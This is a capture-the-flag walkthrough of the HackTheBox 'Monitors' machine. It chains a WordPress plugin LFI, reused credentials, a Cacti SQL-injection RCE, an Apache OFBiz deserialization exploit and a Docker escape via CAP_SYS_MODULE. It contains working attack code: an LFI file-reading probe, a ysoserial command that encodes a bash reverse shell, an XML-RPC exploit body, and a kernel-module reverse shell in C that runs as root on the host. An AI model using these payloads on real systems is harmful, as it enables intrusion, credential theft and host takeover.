# HackTheBox - Monitors

![](/files/-M_RhbJ5ML7ebCtrRAhw)

This box is one of my favourites, as it chains several CVE-tracked vulnerabilities, i.e. bugs that were found and published against real-world software rather than made up for the lab. So let's get started.

### Nmap scan results

```bash
nmap -A -T4 -p- -oA nmap-allport 10.10.10.238
```

![](/files/-M_Ri3wD1s24xUsQM8Ey)

It's always good to scan all the ports. I will be adding **`monitors.htb`** to the /etc/hosts file.

### Enumerating Wordpress

![](/files/-M_RifMgNUL-u1GnuzCW)

I will be using the **`wpscan`** tool, which can help us identify potentially vulnerable plugins and enumerate probable usernames.

```bash
wpscan --url http://monitors.htb/ --enumerate u,vp
```

![](/files/-M_Rj72iYOkVhl1iAnus)

The tool didn't give us any vulnerable plugins, so I will manually browse the plugins directory, located at **`/wp-content/plugins/`**, in case the directory listing exposes a plugin that wpscan did not fingerprint.

![](/files/-M_RjNROcx9Is7NSo3y3)

### WP Spritz Plugin (Vulnerable to LFI)

![](/files/-M_RjYkVciisCbG3uNT9)

{% embed url="<https://www.exploit-db.com/exploits/44544>" %}

![](/files/-M_Rk0AKpXupvC4yFpZH)

We can **`FUZZ`** the `url` parameter with the LFI wordlist over [here](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi-linux-list), or try candidate paths by hand. The first things to try are Apache log poisoning and the other old-school tricks; that didn't give us anything. The next file to look for is **`apache2.conf`**, which tells us where the enabled site configurations (and therefore any extra virtual hosts) live. Another is wp-config.php, which holds WordPress's database credentials, and those are often reused elsewhere.

![](/files/-M_RlmAbClaXNxW9zEgj)

![](/files/-M_Rl2S4FOWD2A56lqOn)
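The manual fuzzing described above, as an added example (not part of the original write-up or of the plugin): a small Python probe that tries each interesting file as an absolute path, behind increasing `../` depth and through `php://filter`, and keeps only responses whose content can be verified with a marker, so a 200 with an empty body is not mistaken for a hit. The endpoint, the parameter name `url`, the candidate paths (including the WordPress docroot) and the demo responses are assumptions; the real vulnerable script path is in the Exploit-DB entry linked above.

```python
"""Probe a file-read / LFI parameter with a short list of high-value files.

Added example; not code from the original write-up or the plugin. The target
URL, the parameter name, the paths and the demo responses are assumptions.
"""
import base64
import re
import urllib.parse
import urllib.request

# Files worth trying first, each with a regex that proves the content really came back
# (a 200 with an empty or error body is not a hit). The WordPress docroot is assumed.
TARGETS = {
    "/etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.M),
    "/etc/apache2/apache2.conf": re.compile(r"IncludeOptional\s+sites-enabled", re.M),
    "/var/www/wordpress/wp-config.php": re.compile(r"DB_PASSWORD"),
    "/var/log/apache2/access.log": re.compile(r'"GET /[^"]* HTTP/1\.[01]"'),
}

PHP_FILTER = "php://filter/convert.base64-encode/resource="


def candidates(path, max_depth=6):
    """Yield the spellings of one path to try: absolute, behind N x '../', then php://filter.

    The php://filter form matters when the sink is include() rather than a raw read:
    an included wp-config.php executes and prints nothing, while its base64-encoded
    source comes back intact.
    """
    yield path
    rel = path.lstrip("/")
    for depth in range(1, max_depth + 1):
        yield "../" * depth + rel
    yield PHP_FILTER + path


def recovered_content(path, body):
    """Return the file content if body matches the marker for path, else None.

    Accepts raw content or a base64 blob (what php://filter returns).
    """
    marker = TARGETS[path]
    if marker.search(body):
        return body
    try:
        decoded = base64.b64decode(body.strip(), validate=True).decode("utf-8", "replace")
    except ValueError:  # not base64 (binascii.Error is a ValueError)
        return None
    return decoded if marker.search(decoded) else None


def fetch_http(url):
    """Default transport: plain GET, body as text."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url, param, fetch=fetch_http):
    """Try every candidate for every target; return {path: (payload_that_worked, content)}."""
    hits = {}
    for path in TARGETS:
        for payload in candidates(path):
            url = base_url + "?" + urllib.parse.urlencode({param: payload})
            try:
                body = fetch(url)
            except OSError:
                continue
            content = recovered_content(path, body)
            if content is not None:
                hits[path] = (payload, content)
                break  # one working spelling per file is enough
    return hits


# Constructed responses standing in for a server: /etc/passwd is readable directly,
# wp-config.php only through php://filter, everything else returns an empty body.
DEMO_RESPONSES = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    PHP_FILTER + "/var/www/wordpress/wp-config.php": base64.b64encode(
        b"<?php\ndefine('DB_USER', 'wpuser');\ndefine('DB_PASSWORD', 'example-only');\n"
    ).decode(),
}


def demo_fetch(url):
    """Offline stand-in for fetch_http that answers from DEMO_RESPONSES (parameter 'url')."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return DEMO_RESPONSES.get(query.get("url", [""])[0], "")


if __name__ == "__main__":
    for path, (payload, content) in probe("http://monitors.htb/x.php", "url", fetch=demo_fetch).items():
        print(f"[+] {path} via {payload!r}\n{content}")
```

Swap `demo_fetch` for the default `fetch_http` (or a requests session with your proxy settings) to run it against the real endpoint; because hits are verified by content, the output is a list of files you actually have, not a list of URLs that returned 200.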

### Discovering cacti-admin.monitors.htb (Virtual host)

There's also virtual hosting present, so we add **`cacti-admin.monitors.htb`** to our /etc/hosts file as well.

![](/files/-M_RlIAvPSoxI9cvs6bd)

![](/files/-M_Rlv1Vz7fpF0UVbBkT)

We now have credentials from the files read through the LFI; the password may well be reused, so we can try it with default usernames like admin, administrator, guest, etc. I tried **`admin : BestAdministrator@2020!`** and got access. (Lucky af)

### Exploiting Cacti (SQLi/ Remote Code Execution)

The version of Cacti in use is **1.2.12**, so let's search Google for known vulnerabilities in that version. It is affected by an authenticated SQL injection (CVE-2020-14295) that can be escalated to remote code execution.

![](/files/-M_RmbNmSYeK2XsXXe5C)

Read how the vulnerability works and download the exploit. It needs valid Cacti credentials, because the injection is only reachable by an authenticated user, which is why the reused password mattered.

![](/files/-M_RnR3UqErMUodCr_CR)

### Docker Enumeration (Scanning for hosts)

After getting the shell, I got stuck for a very long time. Then I decided to proceed with Docker enumeration, since the network interfaces (checked with the **`ifconfig`** command) showed a Docker bridge, which means containers may be reachable from this host.

![](/files/-M_Rnt4m5raGPsntvhBF)

So to search for other hosts on the Docker interface, I transferred a static **`nmap`** binary from my machine with netcat (curl and wget are not installed on the system).

![](/files/-M_RoXEhrcfw1SwjvFIf)

We could use nmap to scan their ports as well, but I like this script, which is comparatively fast and easy and needs nothing but bash (plus `timeout` from coreutils):

```bash
#!/bin/bash
# Quick TCP port sweep using bash's /dev/tcp pseudo-device; no scanner binary needed.

if [[ $# -eq 0 ]]; then
        echo "[-] Supply IP Address"
        exit 1
fi

ip=$1

for i in $(seq 1 65535); do
        # A closed port makes the redirect fail (non-zero status). A filtered port
        # would otherwise hang the loop, so bound each attempt with timeout, and
        # silence bash's "Connection refused" noise on stderr.
        if timeout 1 bash -c "echo > /dev/tcp/$ip/$i" 2>/dev/null; then
                echo "[+] Port open: $i"
        fi
done
```

![](/files/-M_Rp0fFtqKaS8m7chTc)

### Forwarding the ports to our local machine using chisel

Now I will be forwarding these ports to my local machine using chisel. You can get chisel from [here](https://github.com/jpillora/chisel/releases/tag/v1.7.6).

```bash
# My local machine: start the server and allow reverse (R:) forwards
./chisel server --reverse -p 9002

# Remote machine: forward remote 8443 and 8080 back to my machine
# (remote 8080 lands on local 8081 so it does not clash with anything I run locally)
./chisel client 10.10.14.44:9002 R:8443:127.0.0.1:8443 &
./chisel client 10.10.14.44:9002 R:8081:127.0.0.1:8080 &
```

![](/files/-M_Rqi7ydZwq65oYZLKP)

So Apache OFBiz is running on port 8443; we can check that by going to <https://127.0.0.1:8443/catalog> through the forward.

![](/files/-M_Rr47M0ZCgSFp05E7v)

{% hint style="info" %}
Apache OFBiz is an open source enterprise resource planning system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. OFBiz is an Apache Software Foundation top level project.
{% endhint %}

### Exploiting Apache OFBiz XMLRPC Deserialization (RCE)

We can look for known vulnerabilities on Google. The version running is **`17.12.01`**, which I got from the process listing (**`ps aux`** lists the running processes).

![](/files/-M_RrdBehE4oYfXqGs4X)

{% embed url="<https://www.thezdi.com/blog/2020/9/14/cve-2020-9496-rce-in-apache-ofbiz-xmlrpc-via-deserialization-of-untrusted-data>" %}

This one fits: CVE-2020-9496. OFBiz's XML-RPC endpoint at **`/webtools/control/xmlrpc`** accepts the Apache XML-RPC `<serializable>` extension and deserializes its content without authentication, so we only need to send it a malicious serialized Java object.

Intercept a request to that path in Burp and change the request method to **POST**. Also change the **Content-Type** header to **`application/xml`**, then use the body below with the base64 ysoserial output in place of the placeholder.

![](/files/-M_RsS2QhJQy2g8MnIyr)

```xml
<?xml version="1.0"?>
<methodCall>
    <methodName>
        ProjectDiscovery
    </methodName>
    <params>
    <param>
        <value>
            <struct>
                <member>
                    <name>
                        test
                    </name>
                        <value>
                            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                                [Malicious Serialized Data]
                            </serializable>
                        </value>
                </member>
            </struct>
        </value>
    </param>
    </params>
</methodCall>
```

Now to generate the serialized data, I will be using **ysoserial.jar.** Download the jar file from [here](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar). Use this [website](http://www.jackson-t.ca/runtime-exec-payloads.html) to generate the reverse shell command in a form Java's `Runtime.exec()` can run: it does not go through a shell, so the redirections in a bash reverse shell would be passed as literal arguments. The generator base64-encodes the command and uses bash brace expansion (`{echo,...}`) so that no argument contains a space.

![](/files/-M_Rtr9wfywcMs8GhB9u)

```bash
java -jar ysoserial.jar CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40NC8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}' | base64 -w 0
```

Copy the base64 output, paste it inside the `<serializable>` element in Burp and send the request. Make sure you are listening on the port you specified (1337 in the payload above).

![](/files/-M_RuNIra_GW7TFVTz9H)

![](/files/-M_RuQ63p-os911yAf-D)

### Escaping docker using [SYS\_MODULE ](https://man7.org/linux/man-pages/man7/capabilities.7.html)Capability

Now if you check the capabilities, we have **`cap_sys_module`** (check it using **`capsh --print`**).

![](/files/-M_RwBkZqelI5qM11E_I)

{% hint style="info" %}
The **CAP\_SYS\_MODULE** capability lets a process load and unload kernel modules (`init_module(2)`, `finit_module(2)`, `delete_module(2)`). A module runs inside the host's kernel, which the container shares, so code loaded from the container executes with full kernel privileges outside every namespace and cgroup. (The "from anywhere" distinction is about `insmod` taking an arbitrary file path, whereas `modprobe` only searches /lib/modules/; both need this capability.)
{% endhint %}
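The capability check above, as an added example (not the write-up's own code): `capsh` is often absent in a minimal container, but `/proc/self/status` always carries the effective capability mask. This Python helper decodes the `CapEff` hex value into names and flags the ones that by themselves give a route to the host; the two sample status excerpts are constructed, one with Docker's default set and one with CAP_SYS_MODULE added.

```python
"""Decode CapEff from /proc/<pid>/status and flag container-escape capabilities.

Added example; not from the original write-up. The sample status lines are constructed.
"""
import re

# Bit numbers from include/uapi/linux/capability.h (list index == capability number).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]

# Capabilities that on their own let a container reach the host (kernel code, raw
# devices, mounting, ptrace of host processes, reading any host file).
ESCAPE_CAPS = {"CAP_SYS_MODULE", "CAP_SYS_ADMIN", "CAP_SYS_RAWIO",
               "CAP_SYS_PTRACE", "CAP_DAC_READ_SEARCH"}


def decode_mask(mask_hex):
    """Turn a capability bitmask (hex string) into the set of capability names."""
    mask = int(mask_hex, 16)
    return {name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}


def cap_eff(status_text):
    """Extract and decode the CapEff line of a /proc/<pid>/status dump."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line found")
    return decode_mask(m.group(1))


def escape_caps(status_text):
    """Names of the effective capabilities that are worth chasing for a breakout."""
    return sorted(cap_eff(status_text) & ESCAPE_CAPS)


# Constructed excerpts: Docker's default capability set (0xa80425fb), and the same
# with bit 16 (CAP_SYS_MODULE) added.
DEFAULT_STATUS = ("Name:\tbash\nCapInh:\t0000000000000000\n"
                  "CapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n")
SYS_MODULE_STATUS = DEFAULT_STATUS.replace("CapEff:\t00000000a80425fb",
                                           "CapEff:\t00000000a80525fb")


def read_own_status():
    """Read the real /proc/self/status (Linux only); feed the result to escape_caps()."""
    with open("/proc/self/status") as f:
        return f.read()


if __name__ == "__main__":
    print("default docker set:", sorted(cap_eff(DEFAULT_STATUS)))
    print("escape candidates:", escape_caps(SYS_MODULE_STATUS))
```

Inside the target container, `escape_caps(read_own_status())` returning `['CAP_SYS_MODULE']` is the same finding as the `capsh --print` screenshot, without needing any extra binary on the box.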

{% embed url="<https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd>" %}

We can exploit this to get root access on the host machine. The above article explains it very well.

```c
// Reverse shell as a kernel module - I named it shell.c
#include <linux/init.h>
#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

// The helper runs as root in the host's init namespaces; 172.17.0.2:4444 is our listener.
static char *argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/172.17.0.2/4444 0>&1", NULL};
static char *envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

// Runs at insmod time: ask the kernel's usermode helper to spawn the shell.
// UMH_WAIT_EXEC returns once exec succeeds, so insmod does not block on the shell.
static int __init reverse_shell_init(void)
{
	return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

// Runs at rmmod time.
static void __exit reverse_shell_exit(void)
{
	printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
```

```makefile
# Makefile - builds against the headers of the running kernel, which is the host's
# kernel since the container shares it. Recipe lines must be indented with a tab.
obj-m += shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```

![](/files/-M_Rx3oFo7qF907OkAJk)

Now we need a listener on port **4444** at 172.17.0.2 (the address hard-coded in the module, i.e. our end of the connection) before we insert this module.

![](/files/-M_Rxx7PqdscNLJSkeaF)

And now insert the module using the **insmod** command (`insmod shell.ko`). The init function runs in the host kernel, which spawns bash as root on the host and connects it back to our listener.

![](/files/-M_Ry8_3_j3aqycUBm-6)

